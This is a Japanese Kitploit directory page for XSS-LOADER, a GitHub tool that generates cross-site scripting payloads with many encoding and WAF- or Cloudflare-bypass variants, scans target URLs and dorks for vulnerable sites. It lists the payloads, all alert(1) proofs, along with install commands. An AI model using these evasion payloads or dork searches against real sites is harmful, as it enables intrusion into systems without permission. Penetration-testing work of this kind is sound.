Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
XSS-LOADER — Xssペイロードジェネレーター ~ Xssスキャナー ~ Xssドークファインダー | Kitploit
ツール/GitHubGitHub/capture0x/xss-loader
ウェブ脆弱性スキャナーペイロード生成ウェブアプリケーション悪用WAFバイパスペネトレーションテスト
GitHubcapture0x/xss-loader

XSS-LOADER

Xssペイロードジェネレーター ~ Xssスキャナー ~ Xssドークファインダー

リポジトリを見る
6211233ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

💎   XSS-LOADER ツール   💎

作成者: TMRSWRR

Version 1.0.0

XSS PAYLOAD GENERATOR - XSS SCANNER - XSS DORK FINDER のためのオールインワンツール

Instagram: TMRSWRR

📷 スクリーンショット 📷

👇 💌 使い方 💌 👇

使い方

📒 お読みください 📒

  • このツールはXSSインジェクションで使用するペイロードを作成します。
  • パラメータからデフォルトのペイロードタグを選択するか、独自のペイロードを記述します。
  • XSSスキャナーパラメータを使用してXSSインジェクションを行います。
  • XSSドークファインダーパラメータを使用して脆弱なサイトのURLを見つけます。

💿 インストール 💿

requirements.txtを使用したインストール

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

使い方

root@kitploit:~
python3 payloader.py

🗃️ 機能 🗃️

*基本ペイロード

Sets default parameter to :<script>alert(1)</script>

*Divペイロード

Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Imgペイロード

Sets default parameter to :``````

*Bodyペイロード

Sets default parameter to :<body ontouchstart=alert(1)>

*Svgペイロード

Sets default parameter to :<svg onload=alert('1')>

*独自のペイロードを入力

Encodes payload writed by user

*ペイロードジェネレータパラメータ

Encodes payload on selected tag

root@kitploit:~
* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> 
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT

*XSSスキャナ

最初にターゲットのURLを入力する必要があります。 以下の例のようにURLを入力してください ==> 例 ターゲット -----> http://target.com/index.php?name= スキャンするペイロードリストを選択します。

  • BASIC PAYLOAD LIST ==> scriptタグで構成されるペイロードリスト
  • DIV PAYLOAD LIST ==> divタグで構成されるペイロードリスト
  • IMG PAYLOAD LIST ==> imgタグで構成されるペイロードリスト
  • BODY PAYLOAD LIST ==> bodyタグで構成されるペイロードリスト
  • SVG PAYLOAD LIST ==> svgタグで構成されるペイロードリスト
  • MIXED PAYLOAD LIST ==> すべてのタグで構成されるペイロードリスト
  • ENTER FILE PATH ==> ユーザーが指定したペイロードリスト。次の例のようにURLを入力してください。 (例 パス -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

スキャン後、結果は "vulnpayload.txt" に追加されます。

*XSSドークファインダ

最初に検索用のドークを入力してください: 例---->inurl:"search.php?q=" スキャン後、結果は "dork.txt" に保存されます。

既知の問題

修正済み:

  • Unicodeエラー
  • モジュールエラー

重要:

WindowsにインストールされたPython3でツールを使用する場合は、以下のリンクからダウンロードしてください:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

バグと機能拡張

バグ報告や機能拡張については、こちらでissueを開いてください。

Copyright 2020

ツールをダウンロード